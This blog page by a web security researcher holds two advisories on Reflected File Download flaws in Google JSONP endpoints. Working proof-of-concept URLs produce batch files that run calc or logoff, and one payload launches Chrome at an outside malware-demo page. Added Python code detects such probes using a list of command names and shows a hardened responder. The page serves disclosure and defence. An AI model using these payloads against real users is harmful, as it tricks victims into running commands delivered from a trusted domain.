David Sopas – Web Security Researcher

21/01/16 Advisories

Google Finance Reflected File Download

I found this vulnerability while auditing another client. With this RFD you don't need to create a page to force the download:
the request for this Google JSON file already does that for us.

When I noticed this request:

http://www.google.com/finance/info?q=ELI:ALTR&callback=?

Which returned the following information:

// [
{
"id": "703655"
,"t" : "ALTR"
,"e" : "ELI"
,"l" : "4.71"
,"l_fix" : "4.71"
,"l_cur" : "€4.71"
,"s": "0"
,"ltt":"5:35PM GMT+1"
,"lt" : "Dec 15, 5:35PM GMT+1"
,"lt_dts" : "2015-12-15T17:35:40Z"
,"c" : "+0.31"
,"c_fix" : "0.31"
,"cp" : "7.14"
,"cp_fix" : "7.14"
,"ccol" : "chg"
,"pcls_fix" : "4.396"
}
]

I wondered whether the callback parameter could be manipulated, so I injected "calc" into the request:

http://www.google.com/finance/info?q=ELI:ALTR&callback=calc

Which returned the following information:

//
calc([
{
"id": "703655"
,"t" : "ALTR"
,"e" : "ELI"
,"l" : "4.71"
,"l_fix" : "4.71"
,"l_cur" : "€4.71"
,"s": "0"
,"ltt":"5:35PM GMT+1"
,"lt" : "Dec 15, 5:35PM GMT+1"
,"lt_dts" : "2015-12-15T17:35:40Z"
,"c" : "+0.31"
,"c_fix" : "0.31"
,"cp" : "7.14"
,"cp_fix" : "7.14"
,"ccol" : "chg"
,"pcls_fix" : "4.396"
}
]
);

Done! My injected Windows command is reflected into the body of this XHR response. Time to check whether the URL path is permissive, i.e. whether a filename can be appended to the last path segment with a semicolon:

http://www.google.com/finance/info;setup.bat?q=ELI:ALTR&callback=calc

Guess what? I got a URL on the Google domain that automatically shows the browser's download dialog for a batch file.

I tried successfully with the following browsers:

  • Firefox latest version
  • Opera latest version
  • Internet Explorer 8 and 9

What are the limitations?

In my testing most characters are sanitized, so the callback only lets you run a single command with no spaces and no arguments.

Proof-of-concept:
http://www.google.com/finance/info;setup.bat?q=ELI:ALTR&callback=calc
[when the batch file is executed, the Windows calculator opens]

http://www.google.com/finance/info;setup.bat?q=ELI:ALTR&callback=logoff
[when the batch file is executed, the system logs off the authenticated user]

Possible attack scenario:

  1. The attacker sends the URL – http://www.google.com/finance/info;setup.bat?q=ELI:ALTR&callback=logoff – to the victim.
  2. The victim downloads the file and executes it.
  3. When the batch file runs it logs the victim off the operating system.
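On the defensive side, requests of this shape leave a recognisable trace in web-server access logs. The script below is an added example (not part of the original post): it flags the ingredients the proof-of-concept above combines, a Windows-executable filename smuggled into the last path segment with a semicolon, a JSONP callback that is a bare command name, and shell list operators inside any reflected parameter. The log lines, the command list and all function names are constructed for this example.

```python
"""Flag Reflected File Download probes in web-server access logs.

Added example, not part of the original post. The log lines and the
command-name list are constructed for this example.
"""
import re
from urllib.parse import parse_qs, urlsplit

# Combined log format: client address, request line and status are all we need.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(GET|POST|HEAD) (\S+) [^"]*" (\d{3})')

# Extensions that Windows runs from the download bar without further prompts.
EXEC_EXT = re.compile(r"\.(bat|cmd|exe|com|vbs|wsf|hta|scr|ps1)$", re.IGNORECASE)

# Shell list operators; RFD payloads in free-text parameters rely on "||" or "&&"
# to abandon the junk before them and run a command of their own.
SHELL_OPS = re.compile(r"\|\||&&|\|")

# Bare command names seen in RFD proof-of-concepts (hypothetical short list;
# a real deployment would tune this to its own traffic).
COMMAND_NAMES = {"calc", "logoff", "shutdown", "start", "cmd", "powershell",
                 "mshta", "certutil", "bitsadmin"}


def rfd_indicators(url: str) -> list[str]:
    """Return the RFD indicators present in one request target."""
    parts = urlsplit(url)
    hits = []

    # /finance/info;setup.bat -> last segment "info;setup.bat"; the text after
    # the ';' is what the browser offers as the download filename.
    last_segment = parts.path.rsplit("/", 1)[-1]
    if ";" in last_segment:
        suffix = last_segment.split(";", 1)[1]
        if EXEC_EXT.search(suffix):
            hits.append(f"executable filename via path parameter: {suffix}")

    params = parse_qs(parts.query, keep_blank_values=True)
    for cb in params.get("callback", []):
        if cb.lower() in COMMAND_NAMES:
            hits.append(f"callback is a command name: {cb}")
    for name, values in params.items():
        for value in values:
            if SHELL_OPS.search(value):
                hits.append(f"shell operators in parameter {name!r}: {value}")
    return hits


def scan_log(lines) -> list[dict]:
    """Return one finding per request that carries at least one indicator."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a request line we understand
        client, _method, target, status = m.groups()
        hits = rfd_indicators(target)
        if hits:
            findings.append({"client": client, "target": target,
                             "status": int(status), "indicators": hits})
    return findings


# Constructed sample log (not real traffic).
SAMPLE_LOG = [
    '203.0.113.7 - - [21/Jan/2016:10:00:01 +0000] "GET /finance/info?q=ELI:ALTR&callback=jQuery1710_1439 HTTP/1.1" 200 512',
    '203.0.113.9 - - [21/Jan/2016:10:00:02 +0000] "GET /finance/info;setup.bat?q=ELI:ALTR&callback=calc HTTP/1.1" 200 519',
    '198.51.100.4 - - [21/Jan/2016:10:00:03 +0000] "GET /customsearch/v1?callback=jQuery1710_1439&key=&cx=&q=%22%7C%7Cstart+chrome+davidsopas.com%2Fpoc%2Fmalware.htm%7C%7C&num=5 HTTP/1.1" 200 801',
    "garbage line that does not parse",
]

if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding["client"], finding["target"])
        for hit in finding["indicators"]:
            print("   ", hit)
```

Note that "calc" alone would not be caught by a JavaScript-identifier check, since it is a perfectly valid identifier; it is the combination with the `;setup.bat` path parameter that makes the request worth alerting on.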

I made a small video that illustrates my proof-of-concept:

Google decided that this issue has little or no security impact. Personally I don't agree, but that's my opinion 🙂
So this RFD is still unpatched. I hope they change their mind and fix it soon.

07/01/16 Swag

Companies that I’ve helped improve their security

Google, Yahoo!, eBay, Microsoft, Etsy, Nexmo, Weebly, Edmodo, HackerOne, Desk, Adobe, ArubaNetworks, Condé Nast, Linkedin, Acunetix, SendGrid, Rocky Bytes, DepositFiles, Workable, MailChimp, Prestashop, HP, Kaspersky, OLX, RunKeeper, Tumblr, ESET, Symantec, Dowjones, Issuu, Jobs.cz, Alexa/Amazon, McAfee, Booking, AVG, Panda Security, Hootsuite, Circle, DoSomething, Zendesk, Nokia, 123 Contact Form, FoxyCart, Orkut, Segment.io and SilentCircle.

The other ones are private 🙂

10/09/15 Advisories

Google Reflected Filename Download

I found a critical issue on Google that malicious users can use to hijack victims' computers, using a Google domain as the delivery platform and source of trust.

I came across this security issue because, using the Google Inspector, I noticed a JSON request to the following URL:

https://www.googleapis.com/customsearch/v1?callback=jQuery17109823856276925653_1439708781699&key=AIzaSyCMGfdDaSfjqv5zYoS0mTJnOT3e9MURWkU&cx=014141993897103097974%3A46gdqg1e99k&q=xss&num=5&_=1439709781835

After confirming that the callback parameter is reflected in the response, I tried the following GET request:

https://www.googleapis.com/customsearch/v1?callback=calc&key=&cx=&q=xss&num=5

Which returns the following JSON information:

// API callback
calc({
"error": {
"errors": [
{
"domain": "usageLimits",
"reason": "keyInvalid",
"message": "Bad Request"
}
],
"code": 400,
"message": "Bad Request"
}
}
);

It returns HTTP status code 200 even though the JSON body says it is an error. In this case the callback only allows a command without spaces, so in the proof-of-concept above I could execute calc on Windows.

But I wanted a better and more exploitable proof-of-concept, so I tried the query parameter, "q":

https://www.googleapis.com/customsearch/v1?callback=jQuery17109823856276925653_1439708781699&key=AIzaSyCMGfdDaSfjqv5zYoS0mTJnOT3e9MURWkU&cx=014141993897103097974%3A46gdqg1e99k&q=%22%7C%7Cstart+chrome+davidsopas.com%2Fpoc%2Fmalware.htm%7C%7C&num=5

Which returned:

"title": "Google Custom Search - \"||start chrome davidsopas.com/poc/malware.htm||",
"searchTerms": "\"||start chrome davidsopas.com/poc/malware.htm||",

The attack is reflected. Because I couldn't control the filename from the URL alone and force a download, I needed to use the HTML5 vector (an anchor with the download attribute pointing at the URL), which is supported by the following browsers:

  • Chrome
  • Opera
  • Android Browser
  • Chrome for Android
  • Firefox

Online proof-of-concept (downloads a batch file that opens a new Chrome window with a URL; in my PoC the page is just text):

[screenshots: google_rfd3, google_rfd2]

This works on almost all Microsoft Windows versions. It can also be used on Linux and OS X, but that needs more user interaction. For a multi-platform attack a malicious user could serve a malicious .htm file instead of a .bat file. This might be an alternative attack method that works on all operating systems.

So in my proof-of-concept I was able to open a new Chrome window with a page that simulates malware [it's just text].

A malicious user could:

  1. Launch a malicious campaign with a specially crafted page advertising Google offers, similar to my proof-of-concept.
  2. The victim downloads the file thinking it comes from a trusted domain [googleapis.com].
  3. The malicious user gains control over the victim's machine.

How to fix this issue?
Google has already fixed most of these issues by sending the HTTP header Content-Disposition: attachment; filename="f.txt", which forces the downloaded file to be named f.txt every time. But this time they decided not to fix it, because they say it requires too much user interaction.
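To make the fix concrete, here is an added example (not Google's code) of a JSONP responder written two ways: the vulnerable shape seen on this page, which reflects the callback verbatim and leaves the filename to the browser, and a hardened one that sends the Content-Disposition header described above together with the two controls a practitioner would ship alongside it (a callback identifier check and X-Content-Type-Options: nosniff). A small checker lists what a reflecting response is missing. Function names, the header values and the sample payloads are this example's own assumptions.

```python
"""Vulnerable and hardened JSONP responders for the RFD cases on this page.

Added example, not Google's code. Function names and sample data are
this example's own.
"""
import json
import re

# A JavaScript identifier, optionally dotted, with a length bound.
CALLBACK_RE = re.compile(r"^[A-Za-z_$][\w$]{0,63}(\.[A-Za-z_$][\w$]{0,63})*$")


def vulnerable_jsonp(callback: str, payload: dict) -> tuple[int, dict, str]:
    """Reflects the callback verbatim and lets the browser choose the filename."""
    body = f"// API callback\n{callback}({json.dumps(payload)});"
    return 200, {"Content-Type": "text/javascript; charset=UTF-8"}, body


def hardened_jsonp(callback: str, payload: dict) -> tuple[int, dict, str]:
    """Same API shape, but:
    - the callback must be an identifier, otherwise the request is refused;
    - Content-Disposition pins the download name to f.txt, so even a
      permissive URL such as /info;setup.bat cannot yield a .bat file;
    - nosniff stops the body being reinterpreted as another content type.
    Note that "calc" is a valid identifier: the filename pin, not the
    callback check, is what neutralises the Finance payload, and the pin is
    also what covers reflections in non-callback parameters such as q."""
    if not CALLBACK_RE.match(callback):
        return 400, {"Content-Type": "text/plain"}, "invalid callback"
    headers = {
        "Content-Type": "text/javascript; charset=UTF-8",
        "Content-Disposition": 'attachment; filename="f.txt"',
        "X-Content-Type-Options": "nosniff",
    }
    body = f"/**/{callback}({json.dumps(payload)});"
    return 200, headers, body


def rfd_exposure(headers: dict, body: str, injected: str) -> list[str]:
    """List the RFD preconditions a response still satisfies.

    Returns [] when nothing attacker-controlled lands in the body, or when
    the body is reflected but the download name is pinned to a harmless
    extension and sniffing is disabled."""
    if injected not in body:
        return []
    problems = []
    cd = headers.get("Content-Disposition", "")
    pinned = re.search(r'filename="?([^";]+)"?', cd)
    if "attachment" not in cd.lower() or not pinned:
        problems.append("download filename not pinned by Content-Disposition")
    elif re.search(r"\.(bat|cmd|exe|com|vbs|hta|ps1)$", pinned.group(1), re.I):
        problems.append(f"pinned filename is executable: {pinned.group(1)}")
    if headers.get("X-Content-Type-Options", "").lower() != "nosniff":
        problems.append("missing X-Content-Type-Options: nosniff")
    return problems


if __name__ == "__main__":
    quote = {"t": "ALTR", "e": "ELI", "l": "4.71"}  # constructed sample
    for responder in (vulnerable_jsonp, hardened_jsonp):
        status, headers, body = responder("calc", quote)
        print(responder.__name__, status, rfd_exposure(headers, body, "calc("))
```

The checker deliberately treats the callback regex as secondary: it refuses the `"||start chrome ...||` string when it arrives as a callback, but the same string arriving through q is reflected by both responders, and only the pinned filename plus nosniff keeps that reflection from being saved and executed as a batch file.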
